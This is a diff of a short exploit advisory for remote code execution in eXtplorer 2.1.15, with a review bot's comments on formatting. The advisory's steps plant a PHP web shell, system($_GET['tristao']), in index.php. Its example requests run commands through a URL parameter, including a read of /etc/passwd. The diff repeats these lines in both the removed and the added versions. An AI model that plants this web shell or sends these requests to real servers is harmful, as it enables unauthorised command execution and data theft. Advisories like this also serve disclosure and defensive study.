1 | | - | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated) |
2 | | - | Date: 2022-11-09 |
3 | | - | Author: Francisco Marinho |
4 | | - | Vendor Homepage: http://extplorer.net/ |
5 | | - | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip |
6 | | - | Version: 2.1.15 |
7 | | - | Tested on: Linux |
8 | | - | ==========> POC <========== |
9 | | - | |
10 | | - | 1- Login with your account |
11 | | - | 2- Access the directory /index.php |
12 | | - | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two. |
13 | | - | 4- Acess homepage index.php |
14 | | - | Examples: |
15 | | - | cat /etc/passwd |
16 | | - | /index.php?tristao=cat%20%20/etc/passwd |
17 | | - | cat ls -la |
18 | | - | /index.php?tristao=ls%20-la |
| 1 | + | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated)<br> |
| 2 | + | Date: 2022-11-09<br> |
| 3 | + | Author: Francisco Marinho<br> |
| 4 | + | Vendor Homepage: http://extplorer.net/<br> |
| 5 | + | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip<br> |
| 6 | + | Version: 2.1.15<br> |
| 7 | + | Tested on: Linux<br> |
| 8 | + | ==========> POC <==========<br> |
| 9 | + | <br> |
| 10 | + | 1- Login with your account<br> |
| 11 | + | 2- Access the directory /index.php<br> |
| 12 | + | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two.<br> |
| 13 | + | 4- Acess homepage index.php<br> |
| 14 | + | Examples:<br> |
| 15 | + | cat /etc/passwd<br> |
| 16 | + | /index.php?tristao=cat%20%20/etc/passwd<br> |
| 17 | + | cat ls -la<br> |
| 18 | + | /index.php?tristao=ls%20-la<br> |
19 | 19 | | |
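Review bot: every added line (1-18) now ends in a literal `<br>`, including the otherwise empty line 9 and the two request examples on lines 16 and 18, so a reader of the raw file sees markup fused onto the paths (`/index.php?tristao=ls%20-la<br>`) and the metadata fields (Date, Version, Software Link) no longer parse cleanly as plain `Key: value` lines. If the aim is to keep the line breaks when the file is rendered, wrap the whole advisory in one preformatted block instead of tagging each line. Since the change already touches every line, it could also fix the slips it carries over unchanged: "Acess" on line 13 and the label "cat ls -la" on line 17, which does not match the `ls -la` request shown on line 18.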